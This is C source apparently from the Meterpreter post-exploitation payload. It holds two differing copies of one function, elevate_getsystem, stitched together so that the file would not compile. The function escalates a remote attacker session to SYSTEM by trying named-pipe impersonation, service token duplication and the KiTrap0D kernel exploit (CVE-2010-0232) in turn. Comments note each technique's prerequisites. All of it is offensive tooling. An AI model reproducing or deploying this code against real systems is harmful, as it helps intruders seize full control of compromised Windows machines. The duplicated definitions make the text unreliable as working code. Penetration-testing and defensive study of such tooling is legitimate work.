/*!
* @brief Attempt to elevate the current meterpreter to local system using a variety of techniques.
* @details This function attempts to get system level privileges using a number of techniques.
* If the caller hasn't specified a particular technique, then all of the known techniques are
* attempted in order until one succeeds.
* @return Indication of success or failure.
* @retval ERROR_SUCCESS Elevation to `SYSTEM` was successful.
*/
DWORD elevate_getsystem( Remote * remote, Packet * packet )
{
DWORD dwResult = ERROR_SUCCESS;
DWORD dwTechnique = ELEVATE_TECHNIQUE_ANY;
Packet * response = NULL;
do
{
response = packet_create_response( packet );
if( !response )
BREAK_WITH_ERROR( "[ELEVATE] get_system. packet_create_response failed", ERROR_INVALID_HANDLE );
dwTechnique = packet_get_tlv_value_uint( packet, TLV_TYPE_ELEVATE_TECHNIQUE );
dprintf( "[ELEVATE] Technique requested (%u)", dwTechnique );
if( dwTechnique == ELEVATE_TECHNIQUE_ANY || dwTechnique == ELEVATE_TECHNIQUE_SERVICE_NAMEDPIPE ) {
dprintf( "[ELEVATE] Attempting ELEVATE_TECHNIQUE_SERVICE_NAMEDPIPE (%u)", ELEVATE_TECHNIQUE_SERVICE_NAMEDPIPE );
if ( (dwResult = elevate_via_service_namedpipe( remote, packet )) == ERROR_SUCCESS ) {
dwTechnique = ELEVATE_TECHNIQUE_SERVICE_NAMEDPIPE;
break;
}
}
if( dwTechnique == ELEVATE_TECHNIQUE_ANY || dwTechnique == ELEVATE_TECHNIQUE_SERVICE_NAMEDPIPE2 ) {
dprintf( "[ELEVATE] Attempting ELEVATE_TECHNIQUE_SERVICE_NAMEDPIPE2 (%u)", ELEVATE_TECHNIQUE_SERVICE_NAMEDPIPE2 );
if ( (dwResult = elevate_via_service_namedpipe2( remote, packet )) == ERROR_SUCCESS ) {
dwTechnique = ELEVATE_TECHNIQUE_SERVICE_NAMEDPIPE2;
break;
}
}
if( dwTechnique == ELEVATE_TECHNIQUE_ANY || dwTechnique == ELEVATE_TECHNIQUE_SERVICE_TOKENDUP ) {
dprintf( "[ELEVATE] Attempting ELEVATE_TECHNIQUE_SERVICE_TOKENDUP (%u)", ELEVATE_TECHNIQUE_SERVICE_TOKENDUP );
if ( (dwResult = elevate_via_service_tokendup( remote, packet )) == ERROR_SUCCESS ) {
dwTechnique = ELEVATE_TECHNIQUE_SERVICE_TOKENDUP;
break;
}
}
if( dwTechnique == ELEVATE_TECHNIQUE_ANY || dwTechnique == ELEVATE_TECHNIQUE_EXPLOIT_KITRAP0D ) {
dprintf( "[ELEVATE] Attempting ELEVATE_TECHNIQUE_EXPLOIT_KITRAP0D (%u)", ELEVATE_TECHNIQUE_EXPLOIT_KITRAP0D );
if ( (dwResult = elevate_via_exploit_kitrap0d( remote, packet )) == ERROR_SUCCESS ) {
dwTechnique = ELEVATE_TECHNIQUE_EXPLOIT_KITRAP0D;
break;
}
}
} while( 0 );
if( response )
{
packet_add_tlv_uint( response, TLV_TYPE_ELEVATE_TECHNIQUE, dwResult == ERROR_SUCCESS ? dwTechnique : ELEVATE_TECHNIQUE_NONE );
packet_transmit_response( dwResult, remote, response );
}
return dwResult;
}
/*
* Attempt to elevate the current meterpreter to local system using a variety of techniques.
*/
DWORD elevate_getsystem( Remote * remote, Packet * packet )
{
DWORD dwResult = ERROR_SUCCESS;
DWORD dwTechnique = ELEVATE_TECHNIQUE_ANY;
Packet * response = NULL;
do
{
response = packet_create_response( packet );
if( !response )
BREAK_WITH_ERROR( "[ELEVATE] get_system. packet_create_response failed", ERROR_INVALID_HANDLE );
dwTechnique = packet_get_tlv_value_uint( packet, TLV_TYPE_ELEVATE_TECHNIQUE );
// if we are to to use ELEVATE_TECHNIQUE_ANY, we try everything at our disposal...
if( dwTechnique == ELEVATE_TECHNIQUE_ANY )
{
do
{
// firstly, try to use the in-memory named pipe impersonation technique (Requires Local Admin rights)
dwTechnique = ELEVATE_TECHNIQUE_SERVICE_NAMEDPIPE;
dwResult = elevate_via_service_namedpipe( remote, packet );
if( dwResult == ERROR_SUCCESS )
break;
// secondly, try to use the in-memory KiTrap0D exploit (CVE-2010-0232) (Requires Local User rights and vulnerable system)
// Note: If successfully, we end up replacing our processes primary token and as such cant rev3self at a later stage.
dwTechnique = ELEVATE_TECHNIQUE_EXPLOIT_KITRAP0D;
dwResult = elevate_via_exploit_kitrap0d( remote, packet );
if( dwResult == ERROR_SUCCESS )
break;
// thirdly, try to use the in-memory service token duplication technique (Requires Local Admin rights and SeDebugPrivilege)
dwTechnique = ELEVATE_TECHNIQUE_SERVICE_TOKENDUP;
dwResult = elevate_via_service_tokendup( remote, packet );
if( dwResult == ERROR_SUCCESS )
break;
// fourthly, try to use the touching disk named pipe impersonation technique (Requires Local Admin rights)
dwTechnique = ELEVATE_TECHNIQUE_SERVICE_NAMEDPIPE2;
dwResult = elevate_via_service_namedpipe2( remote, packet );
if( dwResult == ERROR_SUCCESS )
break;
} while( 0 );
}
else
{
// if we are to only use a specific technique, try the specified one and return the success...
switch( dwTechnique )
{
case ELEVATE_TECHNIQUE_SERVICE_NAMEDPIPE:
dwResult = elevate_via_service_namedpipe( remote, packet );
break;
case ELEVATE_TECHNIQUE_SERVICE_NAMEDPIPE2:
dwResult = elevate_via_service_namedpipe2( remote, packet );
break;
case ELEVATE_TECHNIQUE_SERVICE_TOKENDUP:
dwResult = elevate_via_service_tokendup( remote, packet );
break;
case ELEVATE_TECHNIQUE_EXPLOIT_KITRAP0D:
dwResult = elevate_via_exploit_kitrap0d( remote, packet );
break;
default:
dwResult = ERROR_CALL_NOT_IMPLEMENTED;
break;
}
}
} while( 0 );
if( response )
{
if( dwResult == ERROR_SUCCESS )
packet_add_tlv_uint( response, TLV_TYPE_ELEVATE_TECHNIQUE, dwTechnique );
else
packet_add_tlv_uint( response, TLV_TYPE_ELEVATE_TECHNIQUE, ELEVATE_TECHNIQUE_NONE );
packet_transmit_response( dwResult, remote, response );
}
return dwResult;
}
